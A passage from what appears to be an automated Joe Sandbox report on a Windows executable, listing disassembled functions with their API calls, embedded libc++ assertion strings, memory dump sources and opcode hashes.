                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,008AEDEA,?,008B6900,008B932E,?,?,?,008B932E), ref: 008AF01D
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008AF118
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Release$Acquire
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                                                                                        • API String ID: 1021914862-4189810390
                                                                                                                        • Opcode ID: 2c2c734e6c61b006740785796804638f8aeb3c3043fccebbe2553762965ee648
                                                                                                                        • Instruction ID: 37e7e8e5bfd5f515640eeed8b18148a2ee2b0f2f2b688e7cfcac4da484f0bf8c
                                                                                                                        • Opcode Fuzzy Hash: 2c2c734e6c61b006740785796804638f8aeb3c3043fccebbe2553762965ee648
                                                                                                                        • Instruction Fuzzy Hash: 0191D5B5E0021A8FDB14CFA8D880AAEB7B5FF49314F144168E905E7782DB71ED01CB91
                                                                                                                        Function 00898730 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008988E3, 008988FE, 00898919
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2849: assertion __s != nullptr failed: string::append received nullptr, xrefs: 00898756
                                                                                                                        • 7S, xrefs: 00898934
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:322: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:2849: assertion __s != nullptr failed: string::append received nullptr$7S
                                                                                                                        • API String ID: 4218353326-2554461371
                                                                                                                        • Opcode ID: 3dafb38cead20b5743aac63c9554e7222d11a3f940f7d932f4380c56e990473a
                                                                                                                        • Instruction ID: 4a16f2d2aa1e5111afafcec8677ea68a529e255c4dacb54e0c7c49af0aacf161
                                                                                                                        • Opcode Fuzzy Hash: 3dafb38cead20b5743aac63c9554e7222d11a3f940f7d932f4380c56e990473a
                                                                                                                        • Instruction Fuzzy Hash: 44512771A0021ADFCF04EF54D881ABD77A4FF85704F58452DF805EB291EB71A915CBA2
                                                                                                                        Function 008F41B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008F429D
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2706: assertion __s != nullptr failed: string::assign received nullptr, xrefs: 008F4289
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008F441C
                                                                                                                        • bran, xrefs: 008F41B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_header
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string:2706: assertion __s != nullptr failed: string::assign received nullptr$bran
                                                                                                                        • API String ID: 3738618077-797417629
                                                                                                                        • Opcode ID: 36e7d13d9b24ef3996e6e09f444dd8a61906b1a3b7acc595429903cede6a7f00
                                                                                                                        • Instruction ID: 11a55be00cc4e1043013661f5041e3396eefc9ac0382a07adb41931762d5094e
                                                                                                                        • Opcode Fuzzy Hash: 36e7d13d9b24ef3996e6e09f444dd8a61906b1a3b7acc595429903cede6a7f00
                                                                                                                        • Instruction Fuzzy Hash: 38617075A142098FDB28CF68D881A7AB7F1FF88314F24917AE609DB391E770D881CB51
                                                                                                                        Function 008765D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 172COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • .log, xrefs: 008766C3, 008766D1, 00876723
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2971: assertion __s != nullptr failed: string::insert received nullptr, xrefs: 008767A1
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 0087679A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:2971: assertion __s != nullptr failed: string::insert received nullptr$.log
                                                                                                                        • API String ID: 4218353326-3763197184
                                                                                                                        • Opcode ID: 1bf08d99524fb41e52ddf6e2022a0f3565bf4f41ae343ab2d99cf1242b0bade6
                                                                                                                        • Instruction ID: fefc09e6aaa1f12742a87d22ccbf2b67104a030cb4d41df1ece29674fd87bf67
                                                                                                                        • Opcode Fuzzy Hash: 1bf08d99524fb41e52ddf6e2022a0f3565bf4f41ae343ab2d99cf1242b0bade6
                                                                                                                        • Instruction Fuzzy Hash: 2E514770D046099FDF14DFA4C880AEEFBB1FF55358F148229E40AB7251E730A855CB51
                                                                                                                        Function 00836530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00836598
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 0083666E
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00836675
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00836630
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 24740636-2860972271
                                                                                                                        • Opcode ID: 96f1f01ebcc49d0c3f347a5425f7247b14cbd4dd4892c9672a2c30ae251f48e6
                                                                                                                        • Instruction ID: 802d61a68663a43f094318e6d929ab3416e0f10e9dd24e882ebe1bb2a1f9540b
                                                                                                                        • Opcode Fuzzy Hash: 96f1f01ebcc49d0c3f347a5425f7247b14cbd4dd4892c9672a2c30ae251f48e6
                                                                                                                        • Instruction Fuzzy Hash: 3D41E270610314AFCB14EB2CD88697A77A5FF90714B188428E447D7A92FB61F915CBD2
                                                                                                                        Function 00834CF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00834E2C
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00834E25
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00834E33
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                                                                                        • API String ID: 4218353326-4247613780
                                                                                                                        • Opcode ID: 150524be8be91a5a2c08cf77c66dfc7326dc548641c6474de0e82d0d705828ac
                                                                                                                        • Instruction ID: e670f8eac00972d44842fa1929a39407c9fc031f8e424385f7069b308f097558
                                                                                                                        • Opcode Fuzzy Hash: 150524be8be91a5a2c08cf77c66dfc7326dc548641c6474de0e82d0d705828ac
                                                                                                                        • Instruction Fuzzy Hash: 8541AD71A042159FCB18DF28D881AABBBA5FFC9314F058199EC05DB246D770E950CBE1
                                                                                                                        Function 0091CD8D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0091CC93,?,?,00000000,00000000,00000000,?), ref: 0091CDB2
                                                                                                                        • CatchIt.LIBVCRUNTIME ref: 0091CE98
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CatchEncodePointer
                                                                                                                        • String ID: MOC$RCC
                                                                                                                        • API String ID: 1435073870-2084237596
                                                                                                                        • Opcode ID: 8d4019e80e60a8d7e98fb82944ba816ed34b0744612a114db00453ddcd577d66
                                                                                                                        • Instruction ID: 944819000f9288c862800a094e581a5fdc4c4634aac8ad822788146edc4b5431
                                                                                                                        • Opcode Fuzzy Hash: 8d4019e80e60a8d7e98fb82944ba816ed34b0744612a114db00453ddcd577d66
                                                                                                                        • Instruction Fuzzy Hash: 874157B2A4020DAFCF16DF98D881AEEBBB9FF48300F198059F905A6251D335DD91DB51
                                                                                                                        Function 008C68A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008C69FA
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008C69EB
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008C6A01
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds
                                                                                                                        • API String ID: 4218353326-378835045
                                                                                                                        • Opcode ID: 32104bc442085d8eca295f6201d052735ed049d037f2d72a73e77110fff7ca93
                                                                                                                        • Instruction ID: ed24d80a7639177b702e54d188278908ca7280125087f3427d47c05db2e9ba41
                                                                                                                        • Opcode Fuzzy Hash: 32104bc442085d8eca295f6201d052735ed049d037f2d72a73e77110fff7ca93
                                                                                                                        • Instruction Fuzzy Hash: 7641B170E042198BCB14CF59D891BAABFB4FF59304B15813EE985EB301F6719859C791
                                                                                                                        Function 00840F90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$do-not-launch-browser
                                                                                                                        • API String ID: 4218353326-2519540672
                                                                                                                        • Opcode ID: 5798679e0e26c18ce6a32d939ce3ecabceacd88c2d1c8cac90ff6a68b13ae826
                                                                                                                        • Instruction ID: df87111bf211530c84bcf22b200132c591ced4e6482dbc200a5b7a1736398cf1
                                                                                                                        • Opcode Fuzzy Hash: 5798679e0e26c18ce6a32d939ce3ecabceacd88c2d1c8cac90ff6a68b13ae826
                                                                                                                        • Instruction Fuzzy Hash: 1B315AA1D0829DAECF207BE4D845BAFBAA4EF51304F144439E901E7182E76109848BD2
                                                                                                                        Function 008B0520 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • %s:%d: %s, xrefs: 008B0605
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 008B063D
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008B0644
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strrchr
                                                                                                                        • String ID: %s:%d: %s$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:323: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range
                                                                                                                        • API String ID: 3213747228-1124368739
                                                                                                                        • Opcode ID: 21f0b48dd14c8e5c56d5587217dbcafdc7484ed645c47d981ac7cd97b20aad65
                                                                                                                        • Instruction ID: c7cc00c60f4f99e90ccab329dee33cefab08e1b270c366215c7101bd4f17076d
                                                                                                                        • Opcode Fuzzy Hash: 21f0b48dd14c8e5c56d5587217dbcafdc7484ed645c47d981ac7cd97b20aad65
                                                                                                                        • Instruction Fuzzy Hash: DF31C271A0430A9FDB24DE68C891FEFB7A4FF95704F14042DE446E7742EB60A9158FA1
                                                                                                                        Function 008C8450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 008C847E
                                                                                                                        • GetUserDefaultLangID.KERNEL32 ref: 008C84A2
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string:2489: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr, xrefs: 008C859B
                                                                                                                        • \StringFileInfo\%04x%04x\%ls, xrefs: 008C84E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DefaultLangUser
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\string:2489: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr$\StringFileInfo\%04x%04x\%ls
                                                                                                                        • API String ID: 768647712-234056397
                                                                                                                        • Opcode ID: b1514e3468076fb1690e9f946b664545ec267a2fe5144c56ae0830214b9845b3
                                                                                                                        • Instruction ID: 1ca81aa81e7fc3aa5a70252faaa7bea9849fcbbfbd3134294aa6cb7a15ecb470
                                                                                                                        • Opcode Fuzzy Hash: b1514e3468076fb1690e9f946b664545ec267a2fe5144c56ae0830214b9845b3
                                                                                                                        • Instruction Fuzzy Hash: 7331E571A102299ADB109F95DC85BFEB3B8FF54310F00405AF804E7291EB78DE84DBA5
                                                                                                                        Function 008ACC80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • Histogram.MismatchedConstructionArguments, xrefs: 008ACB09
                                                                                                                        • ..\..\third_party\libc++\src\include\vector:1400: assertion __n < size() failed: vector[] index out of bounds, xrefs: 008ACC65
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008ACD3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
